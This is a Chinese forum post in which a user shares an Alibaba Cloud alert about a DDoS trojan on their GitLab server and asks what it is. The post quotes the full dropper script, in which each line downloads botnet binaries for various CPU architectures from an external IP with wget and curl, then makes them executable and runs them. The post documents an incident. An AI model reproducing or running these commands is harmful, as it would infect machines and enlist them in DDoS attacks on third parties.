嘟嘟社区

[不限流量] 收到了 阿里云安全事件告警 帮忙看看这是啥

moe

话说 这个ip怎么这么快啊

告警描述:检测模型发现您的服务器上运行了DDoS木马,DDoS木马是用于从被攻陷主机上接受指令,对黑客指定目标发起DDoS攻击的恶意程序。

异常事件详情
文件路径:/var/opt/gitlab/gitlab-workhorse/kk6 (deleted)

异常的脚本内容:

  1. #!/bin/bash
  2. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86;cat gang123isgodloluaintgettingthesebinslikedammwtf.x86 >3AvA;chmod +x *;./3AvA x86
  3. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mips; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mips;cat gang123isgodloluaintgettingthesebinslikedammwtf.mips >3AvA;chmod +x *;./3AvA mips
  4. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mpsl; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mpsl;cat gang123isgodloluaintgettingthesebinslikedammwtf.mpsl >3AvA;chmod +x *;./3AvA mpsl
  5. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm4; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm4;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm4 >3AvA;chmod +x *;./3AvA arm4
  6. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm5; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm5;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm5 >3AvA;chmod +x *;./3AvA arm5
  7. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm6; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm6;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm6 >3AvA;chmod +x *;./3AvA arm6
  8. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm7; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm7;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm7 >3AvA;chmod +x *;./3AvA arm7
  9. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.ppc; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.ppc;cat gang123isgodloluaintgettingthesebinslikedammwtf.ppc >3AvA;chmod +x *;./3AvA ppc
  10. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.m68k; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.m68k;cat gang123isgodloluaintgettingthesebinslikedammwtf.m68k >3AvA;chmod +x *;./3AvA m68k
  11. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.sh4; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.sh4;cat gang123isgodloluaintgettingthesebinslikedammwtf.sh4 >3AvA;chmod +x *;./3AvA sh4

复制代码